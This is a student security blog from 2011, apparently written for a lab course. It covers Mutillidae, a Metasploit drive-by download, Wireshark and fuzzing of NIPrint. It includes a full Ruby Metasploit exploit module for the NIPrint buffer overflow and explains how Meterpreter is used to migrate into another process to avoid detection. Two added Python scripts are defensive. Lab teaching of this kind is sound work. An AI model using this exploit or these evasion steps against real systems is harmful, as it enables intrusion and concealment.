Friday, March 11, 2011

Introduction to Mutillidae

Mutillidae is a set of vulnerable PHP scripts that implement the OWASP Top 10 for testing and teaching purposes.
It has been written so that common attacks are easy to demonstrate to others. Feel free to use it in your own classes. Many web app hobbyists and professionals use PHP, and it’s pretty easy to pick up the basics of the language.

Features of the Mutillidae project:
1. Keep the code and examples simple to understand, so that the point of how a given vulnerability works gets across. With some of the material in WebGoat it is a little hard to figure out how to exploit the code; Mutillidae almost exploits itself. My app won’t be very realistic, but it should illustrate the core concepts well.
2. Be structured so that it’s easy to update with new modules and hints.
3. Be easy to install and run. Just download XAMPP Lite for Windows or Linux, put the scripts in the htdocs directory, and click the “Setup/reset the DB” link in the main menu.


Installation procedure:
Extract the files somewhere in the htdocs folder of XAMPP (for example htdocs/mutillidae). It should go without saying that you should NOT run this code on a production network. Either run it on a private network, or restrict your web server to the local loopback address only. You can do that by finding the “Listen” line in httpd.conf and changing it to read: Listen 127.0.0.1:80

Start the XAMPP Apache server and browse to http://localhost/mutillidae . A page appears from which you can try the Top Ten vulnerabilities. Play with these vulnerabilities and explore them further for fun.
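The loopback restriction above is the one setting that keeps a deliberately vulnerable app off the network, so it is worth checking mechanically. The script below is an added example (not from Mutillidae or the original post) that scans a constructed httpd.conf fragment and reports every Listen directive that is not bound to a loopback address; the sample configuration text is constructed for the example.

```python
import ipaddress

# Constructed httpd.conf fragment in the XAMPP style (sample input, not from the page).
SAMPLE_HTTPD_CONF = """
# Listen: allows you to bind Apache to specific IP addresses and/or ports
#Listen 12.34.56.78:80
Listen 80
Listen [::]:8080
Listen 127.0.0.1:443
"""


def parse_listen(directive):
    """Split one Listen directive into (address or None, port).

    Handles 'Listen 80', 'Listen 1.2.3.4:80' and 'Listen [::1]:80';
    a trailing protocol argument such as 'https' is ignored.
    """
    operand = directive.split()[1]
    if operand.startswith("["):            # bracketed IPv6 address with port
        addr, _, port = operand[1:].partition("]:")
        return addr, int(port)
    if ":" in operand:                     # IPv4 address with port
        addr, port = operand.split(":", 1)
        return addr, int(port)
    return None, int(operand)              # bare port: Apache binds every interface


def is_loopback_only(addr):
    """True when the directive binds a loopback address (127.0.0.0/8 or ::1) only."""
    return addr is not None and ipaddress.ip_address(addr).is_loopback


def exposed_listen_directives(conf_text):
    """Return the Listen lines that would expose the lab app beyond localhost."""
    exposed = []
    for raw in conf_text.splitlines():
        parts = raw.split()
        if len(parts) < 2 or parts[0] != "Listen":   # comments, blanks, other directives
            continue
        addr, _port = parse_listen(raw)
        if not is_loopback_only(addr):
            exposed.append(" ".join(parts[:2]))
    return exposed


if __name__ == "__main__":
    for line in exposed_listen_directives(SAMPLE_HTTPD_CONF):
        print("exposed:", line)
```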

Sunday, March 6, 2011

Creating Drive-by-download using Metasploit

Today we will discuss how to create a ‘drive-by download’ using Metasploit.
“Drive-by download is a type of injection into the target system. When a client requests a service from a hacker’s machine prepared by a black hat, some malicious data or programs get downloaded to the client system without the knowledge of the client.”
There is a module named browser_autopwn, written by ‘EGYPT’, that creates such an exploit. To start, first update Metasploit and run it. The auxiliary module resides at ‘server/browser_autopwn’. Type the command ‘use server/browser_autopwn’ and read about it with the ‘info’ command. This module comes with several payloads based on reverse_tcp connections. Two main things need to be configured: LHOST, the IP address of the host machine’s interface that is connected to the remote machines, and URIPATH, the path under the server’s IP address at which the page is served. You can check the loaded payloads with the ‘set’ command, which shows all the attributes with the values set.
When we execute the ‘exploit’ command, several payloads are loaded and a server starts listening on port 8080 at the specified IP address. From the client computer, type the server’s IP address, port number and URIPATH into the browser, for example ‘http://192.168.80.101:8080/uripath’. The client system automatically downloads code from the Meterpreter library and a session (a shell window with access to the target machine’s memory) opens on the attacker’s machine. The Meterpreter session is then automatically migrated to another process (notepad.exe), which makes the exploit harder to identify on the client machine.
This drive-by download can only be loaded and exploited on a browser that has one of these vulnerabilities. Fully patched or newer versions have been patched or never had the vulnerability, so the exploit could not be carried out against the browser on Windows 7 or on Ubuntu Linux.

Saturday, February 26, 2011

Exploit writing for Metasploit in ruby

So today, I’m going to explain how exploits can be written as a Metasploit module.
Metasploit modules are written in Ruby. Even if you don’t know a lot about Ruby, you should still be able to write a Metasploit exploit module based on this discussion and by referring to some of the existing exploits shipped with Metasploit.

Metasploit exploit module structure

A typical metasploit exploit module consists of the following components:

header and some dependencies
  • Some comments about the exploit module
  • require 'msf/core'
class definition
includes
“def” definitions :
  • initialize
  • check (optional)
  • exploit
You can put comments in your Metasploit module by using the # character. That’s all we need to know for now; let’s look at the steps to build a Metasploit exploit module.

----------------------------------------------------------------------------------------
##
# $Id: newniprint.rb 00001 2011-02-23 20:45:00Z Malkiat $
##

##
# This exploit is created by Malkiat Singh for Week 7 Lab in course info-6012 Hacking & Exploits
# This file is created to exploit the NIPrint running on remote machine
##
# (the module starts with this introductory header)

require 'msf/core'   # this line is required for the core functionality

class Metasploit3 < Msf::Exploit::Remote   # inherits the remote exploit properties

  include Msf::Exploit::Remote::Tcp   # NIPrint listens on TCP, so we include remote TCP in the module

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Modified NIPrint Exploit',   # name shown for the exploit
      'Description'    => %q{It performs an exploit of stack buffer overflow in NIPrint service running on remote machine},
      'Author'         => ['Malkiat Singh'],            # who wrote this module
      'License'        => 'Alone',                      # licensed to whom
      'Version'        => '$Revision: 00001 $',         # any revision number for this module
      'References'     =>
        [
          ['CVE', '2003-1141'],   # further references to this exploit
          ['BID', '8968'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a",   # characters breaking the shellcode
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP0', { 'Ret' => 0x77D5B99F }],   # Windows XP SP0 return address
          ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],   # Windows XP SP3 return address
        ],
      'DefaultTarget'  => 0,   # the target to attack by default
      'DisclosureDate' => 'Feb 23 2011'))

    register_options(
      [
        Opt::RPORT(515)   # default port for remote NIPrint set to 515
      ], self.class)
  end

  def exploit
    connect   # make connection

    req = rand_text_alphanumeric(8192)   # generate data to send
    req[  0, 2] = "\xeb\x33"
    req[ 49, 4] = [target.ret].pack('V')   # return address at offset 49, calculated from pattern_offset.rb as discussed in the previous post
    req[ 53, payload.encoded.length ] = payload.encoded   # shellcode after the return address

    print_status("Trying target #{target.name}...")
    sock.put(req)   # send payload

    handler      # hand over to the payload handler
    disconnect
  end
end

The following few screenshots show the procedure to run this exploit module:
First, find the written module using the search command. The module file should be placed inside the ‘framework/msf3/modules/exploit’ directory. Start Metasploit and search for the module.

Use the module and view its options:

Set the options and run the exploit:

A session is created and a Meterpreter shell is available to control the remote machine. A number of commands are available, which you can list with the help command.

Saturday, February 12, 2011

Wireshark-great protocol analyzer tool

Today’s topic is an introduction to Wireshark, a powerful tool.
Wireshark is a free tool for analysing the traffic flowing across the network. It is also available for the Windows operating system, and you can download it for free from the website: http://www.wireshark.org/download.html . Installation takes only a few easy steps. The tool is not just a packet sniffer; we can do a lot more with it. It is a collection of utilities that help us find malicious activity in our network.
It can capture packets on more than one interface at a time. It distinguishes packets by time, protocol, source and destination address, and the type of query or method used. It displays a lot of information about each single packet and about packets re-assembled as at the destination host, and it interprets some fields automatically to make the security analyst’s task easier. It can also apply colouring rules based on field values, displaying suspicious packets in alert colours. Captured packets can be saved for later review of the activity.
Getting familiar with this tool is not cumbersome. Play with the tool and you can explore much more. There is also a good tutorial online for its standard operation on the website: http://www.wireshark.org/docs/
We can select an interface to capture the packets travelling on it and get detailed information about every packet, with the associated hex values. The detail is divided by network layer, and at the end the application data is appended in the form of queries, answers or data. When a pool of packets has been collected, a filter can exclude unwanted packets by source address, destination address or protocol. Further, we can disable some protocols via the Enabled Protocols item under the Analyze menu.
To conclude, Wireshark is a powerful network protocol analyser that helps notify us of malicious activity and unauthorized packets flowing in our network.

Friday, February 4, 2011

Exploiting target machine using meterpreter/reverse_tcp payload

Now I am going to discuss an interesting topic: manipulating NIPrint on the target system using the meterpreter/reverse_tcp handler payload.
First, start Metasploit, load the reverse_tcp payload, and set the additional attributes such as RHOST and LHOST following the steps discussed in the previous blog post.
This payload exploits the vulnerability on the target system, injects a DLL through reflective DLL injection, and opens a command shell back to the attacker for manipulating the target.
Once the exploit has executed successfully, the attacker can use any of a list of commands to further compromise the target: getting the process identifiers of running processes, dumping password hashes, escalating privileges, hiding the current session in another process, starting a keystroke logger and many more.
You can list the available commands with the ‘help’ command. A number of core commands, file system commands and so on are listed in the shell window.
Importantly, once you have opened a session by exploiting NIPrint, you can hide the attack in a different process using the ‘migrate’ command. The exploit cannot then be detected, as the current session is now associated with a different process. You can continue to manipulate the target, but no detection system can detect your presence on the target system. Migrating from one process to another also helps keep the exploit alive when applications open and close quickly.
I hope this information is helpful.
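As a defender's counterpoint to the migration into notepad.exe described here and in the drive-by download post above, the following script is an added example (not from the original post) that parses ‘tasklist /fo csv /nh’ and ‘netstat -ano’ output and reports established TCP connections owned by processes that should never hold a socket. The sample output, the 192.168.80.101:4444 endpoint and the NO_NETWORK_EXPECTED list are constructed assumptions for the example.

```python
import csv
import io

# Constructed sample in the format of 'tasklist /fo csv /nh' (not a real capture).
TASKLIST_CSV = '''"svchost.exe","876","Services","0","12,404 K"
"notepad.exe","2044","Console","1","6,120 K"
"firefox.exe","3120","Console","1","180,332 K"
"explorer.exe","1516","Console","1","40,212 K"
'''

# Constructed sample in the format of 'netstat -ano' (not a real capture).
NETSTAT = '''  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    192.168.80.102:1045    192.168.80.101:4444    ESTABLISHED     2044
  TCP    192.168.80.102:1046    93.184.216.34:443      ESTABLISHED     3120
  UDP    0.0.0.0:500            *:*                                    876
'''

# Image names that have no business holding a network socket on a workstation.
# Assumption: a list like this is tuned per environment; it is a constructed example.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}


def parse_tasklist(csv_text):
    """Map PID -> lower-cased image name from tasklist CSV output."""
    pid_to_image = {}
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) >= 2:
            pid_to_image[int(row[1])] = row[0].lower()
    return pid_to_image


def parse_netstat(text):
    """Yield (proto, local, remote, state, pid) for the TCP rows of netstat -ano."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":   # header and UDP rows have other widths
            yield parts[0], parts[1], parts[2], parts[3], int(parts[4])


def suspicious_connections(tasklist_csv, netstat_text):
    """Return (image, pid, remote) for ESTABLISHED connections held by unexpected images."""
    images = parse_tasklist(tasklist_csv)
    hits = []
    for _proto, _local, remote, state, pid in parse_netstat(netstat_text):
        image = images.get(pid, "<unknown>")
        if state == "ESTABLISHED" and image in NO_NETWORK_EXPECTED:
            hits.append((image, pid, remote))
    return hits


if __name__ == "__main__":
    for image, pid, remote in suspicious_connections(TASKLIST_CSV, NETSTAT):
        print(f"ALERT: {image} (pid {pid}) has an established connection to {remote}")
```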

Saturday, January 29, 2011

Automatic Exploit using Metasploit

Today’s topic of discussion is NIPrint exploitation using Metasploit.
Metasploit makes exploitation easy for attackers: it performs the exploit itself and opens a terminal from which the attacker can manipulate the target system.
Every time you run Metasploit, don’t forget to update it first. Start the Metasploit console session. It loads the exploits, NOPs, auxiliary modules, payloads and encoders, displays them on the screen, and shows a prompt for executing commands.
For an exploit related to a specific application, use the ‘search’ command. In this case, for NIPrint, use the command ‘search -t exploit NIPrint’. This lists the exploits that contain NIPrint in their name, along with the description provided.
Load an exploit with the ‘use’ command followed by the complete path of the exploit, for example ‘use windows/lpd/niprint’. This selects the exploit for the current operation. Use the ‘info’ command for a detailed description of the exploit.
We add a payload to the exploit with the ‘set’ command. If you don’t know which payload to use, the ‘show payloads’ command lists the payloads you can choose for the current exploit. The command for setting the message box payload is ‘set payload windows/messagebox’; the complete path of the payload must be given to load it.
Further, you can check, view and set the remaining attributes with the ‘set’ command. All attributes are listed with their default values; after providing values for the necessary attributes, run the exploit with the ‘exploit’ command. The exploit triggers and you see results depending on the payload.
With the message box payload, a window appears on the target machine displaying the default alert message.
Finally, if you have misconfigured a value, it can be cleared with the ‘unset’ command followed by the attribute name.

Sunday, January 23, 2011

Exploiting NIPrint using ncat

Now the topic of discussion is exploitation of the NIPrint service using the ncat command.
Download the NIPrint executable from the link: http://www.computerdefense.org/class/nidemo.exe
and the Immunity Debugger executable from the link:
http://debugger.immunityinc.com/register.html after providing some basic details.
After installing both programs in the VMware workstation, start the debugger and NIPrint, then start both services, local and remote print service, under the ‘configuration’ tab and ‘general setting’ menu item. Also install nmap on the host machine so that the ncat command is available.
From the host machine, open a command prompt and run ncat <IP address of remote machine> 515. This opens a command line for user input. Enter as many A’s as needed, repeating the command, until NIPrint on the remote machine crashes.
Here Immunity Debugger is used to intercept the exploit as it occurs: when NIPrint is attached to the debugger, any exploit attempt pauses the application, so we can track what the exploit is doing.
The number of A’s required to overflow the stack buffer in NIPrint is calculated with the pattern_create.rb and pattern_offset.rb scripts. The first generates a string of distinct characters and the second calculates the position of a given substring within it. We find the exact number of characters required by checking, in Immunity Debugger, which input characters have overwritten the EIP register. That value is the offset, i.e. the total number of input characters before EIP that are needed to overflow the buffer in the NIPrint program.